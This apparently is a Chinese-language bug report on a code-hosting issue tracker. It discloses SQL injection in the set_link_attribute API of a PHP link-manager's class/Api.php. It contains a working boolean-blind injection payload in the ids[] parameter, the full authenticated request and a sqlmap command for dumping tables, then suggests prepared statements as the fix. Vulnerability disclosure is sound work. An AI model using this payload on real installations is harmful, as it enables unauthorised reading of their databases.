class/Api.php 存在SQL注入漏洞（SQL injection）

Open kaliworld opened this issue 1 year ago • 0 comments

漏洞点:

在class/Api.php中的301行代码，sql采取了直接拼接的方式，用户输入可控将造成sql注入，''批量修改链接属性为公有或私有“函数中，下面代码是在0.9.34版本的截图： Pasted image 20240225223846

登录后触发批量修改，抓取数据包：

POST /index.php?c=api&method=set_link_attribute HTTP/1.1
Host: 192.168.6.120:9999
Content-Length: 148
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.6.120:9999
Referer: http://192.168.6.120:9999/index.php?c=admin&page=link_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: docs-theme-layout=light; key=a034f271e5b0aefa442258770d672254
Connection: close

ids%5B%5D=9&ids%5B%5D=8&ids%5B%5D=7&ids%5B%5D=6&ids%5B%5D=5&ids%5B%5D=4&ids%5B%5D=3&ids%5B%5D=2&ids%5B%5D=1&property=0

burpsuite插入sql语句，测试布尔盲注：

条件为真返回success

ids%5B%5D=9&ids%5B%5D=8&ids%5B%5D=7&ids%5B%5D=6&ids%5B%5D=5&ids%5B%5D=4&ids%5B%5D=3&ids%5B%5D=2&ids%5B%5D=1) AND 6196=6196 AND (6143=6143&property=0

Pasted image 20240225225507

修改条件为假返回fail，即刻用此方法猜测出数据库内容

Pasted image 20240225225719

保存为，并且利用sqlmap跑出表数据：python sqlmap.py -r new.txt --tables

Pasted image 20240225225231

修复方法：

在拼接sql之前对数据进行消毒，过滤掉恶意的关键字或者使用预编译。

Feb 25 '24 15:02 kaliworld